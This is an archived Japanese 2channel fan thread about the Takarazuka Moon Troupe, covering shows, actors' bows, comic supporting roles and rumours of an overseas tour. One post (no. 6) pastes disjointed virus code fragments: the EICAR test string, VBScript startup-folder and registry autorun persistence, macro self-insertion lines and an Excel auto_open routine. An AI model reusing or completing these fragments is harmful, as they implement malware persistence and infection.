2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

○● パリの 月組語り ●○ 第二十五夜

1 :名無しさん@花束いっぱい。:2007/01/08(月) 16:21:50 ID:N6TAagsT
引き続き月組についてマターリ語るスレです。
前スレ
○● パリの 月組語り ●○ 第二十四夜
http://hobby8.2ch.net/test/read.cgi/siki/1166626976/

●叩き、煽りには大人の対応。
●荒し、青林、ナリキリは原則放置。
●非常識な書き込みは黙って削除依頼。
●ファン括り、決め付け禁止。
●2ch初心者は半年ROMれ。
●長文はいや〜ん。
●新スレは980踏んだ人が立てよう。(要スレ立て宣言・要新スレ誘導)
●マタリとスルーで快適に。

◎上級生を敬愛し、下級生の成長を暖かく見守る気概を持ちましょう!
◎組子皆に、愛と微笑みを!

2 :名無しさん@花束いっぱい。:2007/01/08(月) 16:25:47 ID:7yPZS09F
アルマンドがジョルジュを叩くシーン@ジョルジュが「70フラン〜」と頬を押さえながら応えるのがマイドツボで萌ぇてたのに、最近のジョルジュはなぜか側頭部を押さえている・・・頬だとよくないのだろうか???

3 :名無しさん@花束いっぱい。:2007/01/08(月) 16:30:45 ID:CoLbJeY6
>2
まぁまずは前スレを埋めてからにしよう
(録画したESP今観てるけどリカさんのリーゼントが気持ち悪いよぅ〜)

4 :名無しさん@花束いっぱい。:2007/01/08(月) 16:57:21 ID:7yPZS09F
>3
ほい

5 :名無しさん@花束いっぱい。:2007/01/08(月) 17:09:54 ID:k6IFtMqj
>1
乙。

前スレ埋めれてないけど、こっそり・・・
りかのリーゼントが酷くボミョンなのはESP!!に限ったことではなかろうww

6 :名無しさん@花束いっぱい。:2007/01/08(月) 18:51:21 ID:pwxozNCH
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :名無しさん@花束いっぱい。:2007/01/08(月) 22:53:26 ID:PActwcIA
乙華麗。

8 :名無しさん@花束いっぱい。:2007/01/08(月) 23:42:22 ID:zFMArE3e
スカステ初日の映像を見て・・・
前から思っていたんだけど、きりやんって、いつもあんまり頭下げないよね。
フィナーレ銀橋でトップさんに挨拶するときも、舞台上でお客様に挨拶するときも。
初日映像でも、あさこには頷き程度だし、舞台でもゆうひやかなみより大分早くに頭を上げている。
前から気になってたのよ。あれ直した方がいい。スター気質が強いみたいに見える。

9 :名無しさん@花束いっぱい。:2007/01/08(月) 23:54:31 ID:ehBCaG//
実は頭下げるの苦手とか?www

10 :名無しさん@花束いっぱい。:2007/01/09(火) 01:00:56 ID:YUP7dpXk
>8
こないだ観たいけないビデオ@H2$新公の挨拶では
一緒に頭下げてるオサさんがいつまで頭下げてるんだ、と
チラ見するくらいに下げっぱなしでした
最近はそんなまじめに見てないからわかんなかったなー

11 :名無しさん@花束いっぱい。:2007/01/09(火) 01:48:20 ID:Al+tp0CT
フィナーレ限定なら、羽の重さに耐える自信がないとか?
大羽しょってる時のきりやんの動きって時々面白いことになってる。
お花渡しのカニ歩きとか。
理由はどうあれ、お辞儀は丁寧にした方が印象がいいのは間違いないけどね。
丁寧なお辞儀といえば、トップ羽しょったリカさんが腰を180度位まげて
お辞儀してたことがあった。
すごいな〜前につんのめって転んだりしないのかな、と思った覚えがある。

12 :名無しさん@花束いっぱい。:2007/01/09(火) 01:56:13 ID:VHXH2PGF
180度!?

13 :名無しさん@花束いっぱい。:2007/01/09(火) 02:00:00 ID:YUP7dpXk
>11
あったね、屈伸のようで羽とナイアガラがすごく舞った
綺麗で客席がおおっと言ったものだ
中途半端に90度ぐらいでとめるより180度いっちゃう方が
楽なのかねぇ
エリザなんて羽も衣装もゴージャスで重そうだから
お辞儀しにくそう

14 :名無しさん@花束いっぱい。:2007/01/09(火) 02:04:32 ID:uVFBcbiQ
〉11タソ
それはナイアガラが裏返って床についたということかな?



15 :名無しさん@花束いっぱい。:2007/01/09(火) 02:24:06 ID:1Z0sfN0N
頭が重くて転ぶからだったりして


ファンシー・ダンスでレッド・ツェッペリンのカシミールが使われてて
燃えた

16 :名無しさん@花束いっぱい。:2007/01/09(火) 02:56:06 ID:ZEo7nhAr
え〜っと・・・180度・・・

こないだ粘でたかこさんが90度のお辞儀してたが、
180ってことは膝に頭がつくって感じか?

17 :名無しさん@花束いっぱい。:2007/01/09(火) 16:20:29 ID:yrM24+4n
公演中なのにこんなにのびないの?orz

18 :名無しさん@花束いっぱい。:2007/01/09(火) 16:23:46 ID:tvP96oHy
みんな、公演観てんじゃない?
それにしても、のびないよね…orz

19 :名無しさん@花束いっぱい。:2007/01/09(火) 17:21:50 ID:1U/Aeaah
MY初日終えました。
率直な感想。
芝居は今までの駄作とは違い、不快感やムカツキはゼロ。
ただし睡魔との闘い。2回目観劇時は贔屓が目の前にいるのに
熟睡してしもうた。ああもったいなす。そしてごめんよー。
今後ちょっとでもメリハリが出てくるといいのだけど。

ショーはリピートするごとによくなる印象。
テーマソングが頭に残らないのが残念。
どのシーンも見ごたえ十分。踊りまくりの組子の体力が心配ですが。

東宝合わせてあと最低10回分とってしまった自分orz
芝居をどう乗り切るか、自分なりに考えるわ。
長々すみませんでした・・

20 :名無しさん@花束いっぱい。:2007/01/09(火) 17:53:06 ID:Xx+p6Fjh
自分も先週末に観劇したけど、お芝居は19さんと同じく睡魔との闘い
ってか、最初の説明ばかりの場面では寝てました。

ところで昨日のNOW ON、「シェラザード」の花嫁が
きりやん、ゆうひ、あひだったら…って話題になってたけど、
「それ激しく見たい!」と思った。




21 :名無しさん@花束いっぱい。:2007/01/09(火) 18:09:00 ID:seQ6/tGS
>>20
> ってか、最初の説明ばかりの場面では寝てました
           このシーン、まっち先輩を見てれば笑いこらえるの必死になって
睡魔に打ち勝つことができますよ

22 :名無しさん@花束いっぱい。:2007/01/09(火) 19:08:42 ID:AY9bKByh
スマン、マツィオ様を見て笑いをこらえきれなかったのは私です。
マツィオ様は至る所で大活躍。
いつもの調子の台詞回しと変な動きに釘付けでした。
つか台詞多すぎです!

ショーではエトワールの1人れみちゃん御注目。
「ダンダンダンダンダンスィ〜」・・・1人だけ変な動き・・
前公演の理事様の動きを彷彿とさせてます。

見出すとツボが増えてオモロイ!


23 :名無しさん@花束いっぱい。:2007/01/09(火) 19:17:52 ID:1U/Aeaah
>>22
同じくw
今回マツィオ先輩活躍しすぎw
なるべく見ないようにがんがったけど目に付く変な動きに台詞まわしで
笑いこらえるのが大変ですた
私の隣座ってた人も、同じように体震えてた
睡魔対策はマツィオ先輩で

24 :名無しさん@花束いっぱい。:2007/01/09(火) 19:20:29 ID:gqsKz0RB
ショーは、観るたびに良くなる感じがするんだよね。
主題歌だって、パリみたいに単純じゃない分
覚え応えはあるよ。フレーズは耳に残りやすいし。

芝居は何とも・・・・・
ベテラン群の説明台詞の長さに辟易しながらも、
詰まらずに言えることに感動したり。
ただ、そこまでがやたら長いのに、
あさこが出てくるや否や、弾丸の様に早口で喋りまくるのが
聞いてて、ちょっと疲れる。
植爺は、それが良いと思ってるようだけど、
ナウオンであさこ自身も言ってたように、
台詞を話すだけで、まだ一杯一杯なのではないのだろうか・・・・

25 :名無しさん@花束いっぱい。:2007/01/09(火) 19:29:11 ID:AY9bKByh
うん私もショーで通える。
全体的に大人っぽい作りになっていて好きな人はとことん好きになれると思う。
二階席で観ると良さが分かりやすいです。
キリヤンのペトルーシュカ秀逸でした。
回り舞台で麻かなの踊る場面、雰囲気があり懐かしい気分にさせられました。

26 :名無しさん@花束いっぱい。:2007/01/09(火) 19:34:34 ID:KpCyTxDa
>23
あたしも同じくw
マッチ先輩今回台詞多杉w私は堪えきれずに笑っちゃったよ…。
昨日は連れがいたからいいけど今度は一人だから堪えなきゃw

あたしも今回はショーが気に入ったから通える。
けど中詰めのワンモワタイム!のあとはもうちょっと長くてもいいのにと思う。

27 :名無しさん@花束いっぱい。:2007/01/09(火) 19:59:47 ID:28aKRDXg
今回のエトワールは3人ですが、どういう並びですか?おときちがセンター?

28 :名無しさん@花束いっぱい。:2007/01/09(火) 20:17:03 ID:KpCyTxDa
センターおときち、上手にすずな、下手にれみだよ。

29 :名無しさん@花束いっぱい。:2007/01/09(火) 20:38:31 ID:28aKRDXg
>28
ありがとう!
おときちがセンターで嬉しい。なんだか月娘のエトワール久しぶりのような気がする…レビュドリであいあいがやったが。きっと理事のインパクトが凄かったんだな…orz

30 :名無しさん@花束いっぱい。:2007/01/09(火) 22:00:31 ID:/t0PP0Gf
エトワール上手は 憧花ゆりの だよ。

31 :名無しさん@花束いっぱい。:2007/01/09(火) 22:21:23 ID:zW+02Czd
憧花=すずな

32 :名無しさん@花束いっぱい。:2007/01/09(火) 22:41:28 ID:VtZv4dR1
ショーだけのチケットがあったら何回でも観に行くのに!!
娘役ファンとしては今回見所が沢山あって嬉しい限り。
個人的にすずなファンなので今回エトワールの一人に
選ばれて嬉しかった!


33 :名無しさん@花束いっぱい。:2007/01/09(火) 22:47:54 ID:kotCEMUj

スカステで録画したESP!を見た

贔屓より先にうっかりマツィオ様を見つけてしまった
                                  _| ̄|○

自分的にあまりのことに流れをぶった切って報告

34 :名無しさん@花束いっぱい。:2007/01/09(火) 22:52:45 ID:1U/Aeaah
>33
元気だせ
このスレの住人ならみんなおまいさんの気持ちがわかるよ・・・

35 :名無しさん@花束いっぱい。:2007/01/09(火) 23:06:05 ID:KpCyTxDa
>33
ドンマイ。あたしだってパリ空観に行って贔屓より先にマチオ
様を見てしまったからその気持ち分かるよ。

話豚切るが、中詰め最初に出てくるあさかなのスクリーンって
ヘイズ・コードのポスターに似てるわ。

36 :名無しさん@花束いっぱい。:2007/01/09(火) 23:09:32 ID:tvP96oHy
マチオ様、ここ見てるかな・・・?

37 :名無しさん@花束いっぱい。:2007/01/09(火) 23:17:57 ID:9KjuwyUx
あさかなのデュエダン綺麗だった。
あさこってピンク似合うのが意外だった。
ブルーのスーツのきりやんもかっちょいい。

38 :名無しさん@花束いっぱい。:2007/01/09(火) 23:19:51 ID:B9npsf/G
マツィオ様なんだってあんなに出番あるんだ?

39 :名無しさん@花束いっぱい。:2007/01/09(火) 23:26:44 ID:ZEo7nhAr
>>38まさか退団ご祝儀の前渡し・・・?((((;゜Д゜)))




なわけないか、マチオに限って。

40 :33:2007/01/09(火) 23:30:22 ID:kotCEMUj
>34>35
ありがとうよ…(つД`)
まだパリ空/ファンシー観てないけど
マツィオ様をまず見つけてしまいそうだ…

41 :名無しさん@花束いっぱい。:2007/01/09(火) 23:34:38 ID:slQfAxKP
前のナウオンは理事がいたから
麻子さん、ちっちゃくなってた?けど、今回は大分堂々としてるねw

42 :名無しさん@花束いっぱい。:2007/01/09(火) 23:44:02 ID:GVInWjWr
デイリーの麻子の発言頼もしいね。
月組良い雰囲気なんだな〜って嬉しくなった。

43 :名無しさん@花束いっぱい。:2007/01/09(火) 23:49:17 ID:MEVbrRPq
>42
どんな発言でしたか?

44 :名無しさん@花束いっぱい。:2007/01/09(火) 23:58:12 ID:1U/Aeaah
>40
わりと早い段階で見つけてしまい
しゃべり出した瞬間、まじで噴出しそうになるから
ぶあついタオルとか口元に当てることをおすすめしまつ。
これ、ほんとだから!(私は一度声が出てしまった・・)

45 :名無しさん@花束いっぱい。:2007/01/10(水) 00:07:56 ID:UbVHXRF6
>>43
概要だけど、「新生月組になってから、今迄は土台作りの時間だったけど、
その土台がしっかり出来た今、一人一人が個性を打ち出して
前に出ても崩れることはない、大丈夫だと思う。
自分も月組の皆の大きな胸を借りて飛び出していけたら、と思うし、
いい意味でどんどんはじけて前に出たい。
皆が飛び出す勢いをお見せしたい、
(組が)安定しているが故の勢いを出せる様頑張る」

概要と言いながら長くなった、ゴメソ。

46 :名無しさん@花束いっぱい。:2007/01/10(水) 00:11:29 ID:gcl5ifRd
>42(45)
早々にありがとう。
へぇ、本当にいい感じだね。
昨夜のNOW ON〜でも、その「安定」感じました。
まだ観てなくて、色々言われてるみたいだけど、
私は安心して観に行こうと思ってる。

47 :名無しさん@花束いっぱい。:2007/01/10(水) 00:22:32 ID:RTGFUhfj
>41
それ、私も思った。
今回のナウオンでは、周りに気を使いすぎることなく、なれあいすぎることもなく、
威張ってるとかじゃなく感じよく堂々としていて、よかった。
自然体でトップとして存在できるようになってきたのかな。
これまでは、感謝とか心遣いとかそんなにアピールしなくても大丈夫だよ、みんな
分かってるよ、と声をかけたくなるような雰囲気があった。
あさことしてはそうせずにはいられなかったんだろうけど、そういう時期を抜けた
のだとしたら、これからが楽しみかも。

48 :33:2007/01/10(水) 00:40:11 ID:HepuH6dK
>44
マヂですかい。・゚・(ノД`)・゚・。

49 :名無しさん@花束いっぱい。:2007/01/10(水) 02:18:31 ID:Jt30DpVw
>>47
そうだよね、そうだよね…涙
多少はまだ、(色んな意味で)ぎこちない部分あるかもだけど、さぁこれから、という感じだよね。
うん、いい雰囲気だ。よかった!

50 :名無しさん@花束いっぱい。:2007/01/10(水) 08:30:32 ID:Naty5SOb
情報スレにこんな情報が・・・・゚・(ノД`)・゚・。

39 :名無しさん@花束いっぱい。:2007/01/10(水) 07:42:46 ID:4PzyPaVy
けさ10日のラジオNHK第一の6時のニュースの後の海外レポートは台湾からで「今年は日台文化交流年で、宝塚歌劇団の公演も予定されています。」と言ってました。

41 :名無しさん@花束いっぱい。:2007/01/10(水) 08:10:36 ID:4PzyPaVy
>40
この耳でしっかり聞きした。そういや月組次回のショーは台湾出身の謝でしたね。

これって、ほぼ決定か・・orz
全ツにディナーショー、そして海外講演まできたら破産しそ・・


51 :名無しさん@花束いっぱい。:2007/01/10(水) 10:25:11 ID:g9TH71sj
>>50マジで?orz

組子全員・・・いくんだろうな。
どのみち自分は行かないけど。

でももしあるなら、阪急ホクホクだよな〜。雪のウィーンもあるし。

52 :名無しさん@花束いっぱい。:2007/01/10(水) 12:49:08 ID:KxvyQ/uX
うわさどおり年末なら
組子全員じゃなくて、DC組もいるのでは。

53 :名無しさん@花束いっぱい。:2007/01/10(水) 13:02:21 ID:Naty5SOb
あさかなきりで行くって書いてあったね。>情報スレ
あぁ、現実化しそうでコワス・・・

54 :名無しさん@花束いっぱい。:2007/01/10(水) 16:04:54 ID:+vLr+q69
海外公演ホントにありそうだね…。
近場なら行けるけど、やってほしくないな。金がなくなる(⊃Д`)・゚・
でももしあるなら海外組とDC組に分かれそう。

55 :名無しさん@花束いっぱい。:2007/01/10(水) 18:56:46 ID:wGMk3j3z
海外まで行けませーんorz

56 :名無しさん@花束いっぱい。:2007/01/10(水) 19:05:26 ID:a2SVQBZr
行くならMAHOROBAと何だろうね。
まさかマジシャン?

57 :名無しさん@花束いっぱい。:2007/01/10(水) 20:14:20 ID:ScaUsTz1
本決まりになってから泣く
今は目の前のチケットが大事

58 :名無しさん@花束いっぱい。:2007/01/10(水) 20:43:26 ID:etExfj1r
海外公演なんてなんでやるのかね。
中国・韓国・台湾あたりなんて
やっても観客は大半が日本から行くファンと現地の関係者・偉いさんばっかじゃないの?
でもまだ決定じゃないし、選抜という希望もある…(後ろ向き)

59 :名無しさん@花束いっぱい。:2007/01/10(水) 20:45:53 ID:qrLLTg0l
私のご贔屓が国内ユウヒDC組でありますように・・・ナムナム

60 :名無しさん@花束いっぱい。:2007/01/10(水) 20:50:04 ID:Ma6amecz
ユヒDCってケテーイ?
ソースは?

61 :名無しさん@花束いっぱい。:2007/01/10(水) 20:51:10 ID:HepuH6dK
海外公演なら衣装とかセットとか音楽とかお金を
出してもらえてゴージャスになるんじゃないかと
前向きな考え方をしてみる

62 :名無しさん@花束いっぱい。:2007/01/10(水) 20:51:57 ID:HepuH6dK
>60
情報スレで鳥付きさんがこそっと落としたネタ

63 :名無しさん@花束いっぱい。:2007/01/10(水) 20:52:44 ID:GS/5wSHA
海外まで観に行く気はさらさらないし忙しくて大変そうだけど
贔屓が行ってくれた方がうれしい
・・・っていう自分みたいな人って少ないみたいですね

64 :名無しさん@花束いっぱい。:2007/01/10(水) 22:07:38 ID:rsIi44Nj
もし年末DCゆひなら…もしかして、もしかする?
DCでサヨナラはないよな…。

65 :名無しさん@花束いっぱい。:2007/01/10(水) 22:08:54 ID:eUrMxL2h
9日にmy初日の遠征してきました〜

初めのレビュー、麻子の声に張りがなくお疲れか?と思いますた。
また、台詞もちょっとかんじゃって、
勢いのある台詞だから一度かむと戻すのが大変そう。。。
確かに最初の設定の説明台詞は退屈だったけど、楽しかったよ!

ショーも繰り返しが多いので主題歌は覚えにくくないし、
東宝が待ち遠しくてたまんないです!

66 :名無しさん@花束いっぱい。:2007/01/10(水) 22:13:32 ID:ifSCI7DL
>64
考えないようにしてるから言わないでおくれ・・・。

67 :名無しさん@花束いっぱい。:2007/01/10(水) 22:19:41 ID:W4fTlWLb
ユウヒ、寿ってマジですか?麻子の御身内とマジ?ネタだよね?


68 :名無しさん@花束いっぱい。:2007/01/10(水) 22:29:11 ID:HepuH6dK
>67
できすぎてネタなかほりがプンプンでございます

69 :名無しさん@花束いっぱい。:2007/01/10(水) 22:34:48 ID:GIu/H9Wi
あさこの身内はもうジェンヌと結婚してるよw

70 :名無しさん@花束いっぱい。:2007/01/10(水) 22:44:02 ID:n0a+swQH
アサコ、寿ってマジですか?ユウヒの御身内とマジ?ネタだよね?

71 :名無しさん@花束いっぱい。:2007/01/10(水) 23:04:07 ID:wY4V0kPp
ゆひたん かっこいい!
http://j.pic.to/8564p

72 :名無しさん@花束いっぱい。:2007/01/10(水) 23:05:02 ID:dxF1qcSA
ID:HepuH6dK
なんかちょっとワンパターン化しているな
いつも同じような調子の文体の書き込みのあなた
最初の1、2回は面白かったけど
いい加減に趣向を変えてみたらどうかな

73 :名無しさん@花束いっぱい。:2007/01/10(水) 23:30:06 ID:HepuH6dK
>72
すまん、よくわからない なーに?

74 :73:2007/01/10(水) 23:31:06 ID:HepuH6dK
なんだ、マルチか

75 :名無しさん@花束いっぱい。:2007/01/10(水) 23:34:09 ID:HJYKMl/X
ここで聞いても良いでしょうか。
東宝のパリ空公演後に、講演会?のようなことが
行われると書いてあったようですが、
日程がわかられるかた、教えていただけますか。


76 :名無しさん@花束いっぱい。:2007/01/10(水) 23:41:39 ID:0rnsjw+k
>>75
東宝にチラシがおいてあった「作品を語る夕べ」のことかな?
詳しくは↓

日本演劇協会ホームページ
http://www.jtaa.or.jp/

77 :名無しさん@花束いっぱい。:2007/01/11(木) 00:24:53 ID:OAxeb5bJ
ゆうひ・・・まだまだ見ていたいし一縷の望みは捨てていないが
でも、女としての幸せを掴んで去るのならば
それはそれで心から祝って送り出したい、なんて複雑な心境だw
パリ空もいいが、暁のゆうひが可愛くてならんww

78 :名無しさん@花束いっぱい。:2007/01/11(木) 00:31:11 ID:NU5Pbrwi
あさこの身内云々は別にして噂出てるのかな?
あさこにもキリにも結婚はしてほしいけど、
も少しこの3人の魅力を生かした作品に出会ってからにしてほしい。

79 :75:2007/01/11(木) 00:41:45 ID:+A3SXAMm
>>76さま
3月5日でした。観劇セットは売り切れてましたね。
フォーラムのチケットは、まだ、今から間に合いそうです。
ありがとうございました。

80 :名無しさん@花束いっぱい。:2007/01/11(木) 02:55:36 ID:5oE14oGq
海外かぁ…
追い掛けたいけど、絶対無理w
暇な奥様方しか無理だろうね。

そろそろヨーロッパ公演を復活してほしいな。何で最近はアジアが多いんだろう。

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)